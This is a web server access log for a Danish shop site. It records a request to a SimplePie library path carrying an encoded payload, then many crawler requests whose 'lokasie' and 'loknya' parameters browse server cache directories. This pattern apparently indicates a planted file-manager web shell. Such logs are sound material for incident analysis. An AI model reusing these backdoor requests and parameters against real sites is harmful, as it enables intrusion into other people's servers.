185.21.40.28 - - [29/Jul/2026:07:27:18 +0200] "GET /wp-includes/SimplePie/library/SimplePie/Net/Net/index.php?ARRAY=7o2230223n313738353330363433382p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353330323833382q3832613232306137643161306235363766303838323835623436666466663965222p2232223n223035353065336239323162373134656535373262646164306539663230643661222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34382q35392q36342q37342q38362q3131227q HTTP/1.1" 500 567 "-" "-"
74.7.227.174 - - [29/Jul/2026:07:29:18 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/9/a/a/9aa3046a4be8b695&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/9/a/a HTTP/2" 200 19726 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/9/a/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:18 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/0/1/8/01806a47a076793f&loknya=/var/www/vhosts/store-bors.dk/lscache/0/1/8 HTTP/2" 200 1806 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/1/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:20 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/3/2/6/32676e466db8f482&loknya=/var/www/vhosts/store-bors.dk/lscache/3/2/6 HTTP/2" 200 19715 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/3/2/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:20 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/b/8/f HTTP/2" 200 1994 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/b/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:20 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/2/a/1/2a1c3422ee399c3a&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/2/a/1 HTTP/2" 200 19553 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/2/a/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:20 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/6/3/8/638d4836f9075f6f&loknya=/var/www/vhosts/store-bors.dk/lscache/6/3/8 HTTP/2" 200 21730 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/6/3/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:21 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/2/8/5/285b4f32796148bf&loknya=/var/www/vhosts/store-bors.dk/lscache/2/8/5 HTTP/2" 200 1841 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/2/8/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:21 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/3/a/9/3a984d8a6caee3a4&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/3/a/9 HTTP/2" 200 1864 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/3/a/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:07:29:22 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F5%2Fc%2F4 HTTP/2" 200 1987 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:07:29:22 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/9/1/4/914774ce14678043&loknya=/var/www/vhosts/store-bors.dk/lscache/9/1/4 HTTP/2" 200 19640 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/9/1/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:22 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/9/a/4/9a49d344b9de8caf&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/9/a/4 HTTP/2" 200 25851 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/9/a/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:23 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/9/1/4/9143888a726b77e7&loknya=/var/www/vhosts/store-bors.dk/lscache/9/1/4 HTTP/2" 200 19680 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/9/1/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:24 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/0/c/7/0c7cc70b959a5eba&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/0/c/7 HTTP/2" 200 19686 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/0/c/7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:25 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/9/1/4/9145f8c48d9e0763&loknya=/var/www/vhosts/store-bors.dk/lscache/9/1/4 HTTP/2" 200 25852 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/9/1/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:25 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/c HTTP/2" 200 2154 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:25 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/4/8/2/48278c3aaa8e14ec&loknya=/var/www/vhosts/store-bors.dk/lscache/4/8/2 HTTP/2" 200 25848 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/8/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:26 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a HTTP/2" 200 2202 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:26 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/5/6/1 HTTP/2" 200 1968 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:26 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/./././././lscache/9 HTTP/2" 200 1787 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/./././././lscache/9/7/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:27 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/5/9/0 HTTP/2" 200 2018 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:27 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3 HTTP/2" 200 2171 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:27 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/6/3/3 HTTP/2" 200 1983 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/6/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:27 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2 HTTP/2" 200 2149 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:28 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/2/1/4 HTTP/2" 200 2080 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/2/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:28 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.k/./././././lscache/9 HTTP/2" 200 1784 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.k/./././././lscache/9/9/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.31 - - [29/Jul/2026:07:29:28 +0200] "GET /category-sitemap.xml?lokasie=/var/www/vhosts/store-bors.dk/lscache/c/0/b/c0b80d5a57decd97&loknya=/var/www/vhosts/store-bors.dk/lscache/c/0/b HTTP/2" 200 17546 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
74.7.243.235 - - [29/Jul/2026:07:29:28 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/8/6/5 HTTP/2" 200 1984 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/8/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:28 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/b/8/f/b8fcc75522f3f41e&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/b/8/f HTTP/2" 200 19701 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/b/8/f" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:29 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9/6 HTTP/2" 200 1969 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:29 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.k/./././././lscache/6 HTTP/2" 200 1787 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.k/./././././lscache/6/1/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:30 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/8/9/0 HTTP/2" 200 2038 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/8/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.19 - - [29/Jul/2026:07:29:30 +0200] "GET /category-sitemap.xml?loknya=/var/www/vhosts/store-ors.dk/lscache/d HTTP/2" 200 1959 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
57.141.0.8 - - [29/Jul/2026:07:29:30 +0200] "GET /?o=220876018 HTTP/2" 200 4425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
74.7.227.174 - - [29/Jul/2026:07:29:30 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2 HTTP/2" 200 2116 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:07:29:30 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2Fa%2F0 HTTP/2" 200 1980 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:07:29:31 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/5/0/3 HTTP/2" 200 2034 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:31 +0200] "GET /index.php?loknya=/var/www/vhosts/store-ors.dk/./././././lscache/7 HTTP/2" 200 1790 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-ors.dk/./././././lscache/7/5/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:31 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/1/3/1 HTTP/2" 200 2031 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:31 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4 HTTP/2" 200 2170 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:32 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/0/9/6 HTTP/2" 200 2101 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:32 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/c/1 HTTP/2" 200 2048 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:07:29:32 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2F6%2F2 HTTP/2" 200 1973 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:07:29:32 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/8/1/3 HTTP/2" 200 1975 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/8/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:32 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a/9 HTTP/2" 200 1988 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:33 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/7/6/0 HTTP/2" 200 1974 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/7/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:33 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a/2 HTTP/2" 200 1992 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:33 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/5/9/0/5902e4b1b535d10f&loknya=/var/www/vhosts/store-bors.dk/lscache/5/9/0 HTTP/2" 200 25835 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/9/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:33 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/c/5 HTTP/2" 200 1992 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.53 - - [29/Jul/2026:07:29:34 +0200] "GET /category-sitemap.xml?lokasie=/var/www/vhosts/store-bors.dk/lscache/0/a/8/0a87e525ac1e561c&loknya=/var/www/vhosts/store-bors.dk/lscache/0/a/8 HTTP/2" 200 22081 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
74.7.227.174 - - [29/Jul/2026:07:29:34 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/6 HTTP/2" 200 1995 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:34 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/6/3/3/633d520163f95108&loknya=/var/www/vhosts/store-bors.dk/lscache/6/3/3 HTTP/2" 200 20468 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/6/3/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:34 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/0 HTTP/2" 200 1990 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:35 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/2/1/4/214184195894f9ad&loknya=/var/www/vhosts/store-bors.dk/lscache/2/1/4 HTTP/2" 200 22125 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/2/1/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:35 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2/8 HTTP/2" 200 1988 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/c/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:35 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/8/6/5/865723d5cdea3856&loknya=/var/www/vhosts/store-bors.dk/lscache/8/6/5 HTTP/2" 200 1826 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/8/6/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:35 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3/3 HTTP/2" 200 1987 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:36 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/4/9/6/496b875e4a4cf940&loknya=/var/www/vhosts/store-bors.dk/lscache/4/9/6 HTTP/2" 200 25748 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:36 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2/8 HTTP/2" 200 2093 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:36 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/8/9/0/8902d47e876abfb1&loknya=/var/www/vhosts/store-bors.dk/lscache/8/9/0 HTTP/2" 200 22051 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/8/9/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:37 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2/7 HTTP/2" 200 2083 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/d/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:37 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/5/0/3/5033ab2e97e5b9f5&loknya=/var/www/vhosts/store-bors.dk/lscache/5/0/3 HTTP/2" 200 1837 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/5/0/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:37 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4/9 HTTP/2" 200 1995 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/e/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:07:29:37 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2Fc%2F0 HTTP/2" 200 2032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:07:29:38 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/8/9/0/89049271781a03f5&loknya=/var/www/vhosts/store-bors.dk/lscache/8/9/0 HTTP/2" 200 1831 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/8/9/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:38 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/5/c/1/5c1486fd9cc49365&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/c/1 HTTP/2" 200 1859 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/5/c/1" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:38 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/0/9/6/096b22a3720b6c64&loknya=/var/www/vhosts/store-bors.dk/lscache/0/9/6 HTTP/2" 200 25798 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/9/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:07:29:38 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././lscache/1/a/9/1a97b6ec07774472&loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a/9 HTTP/2" 200 19670 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././lscache/1/a/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:07:29:39 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/0/9/6/0961a5f28e34b7b8&loknya=/var/www/vhosts/store-bors.dk/lscache/0/9/6 HTTP/2" 200 25823 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/9/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
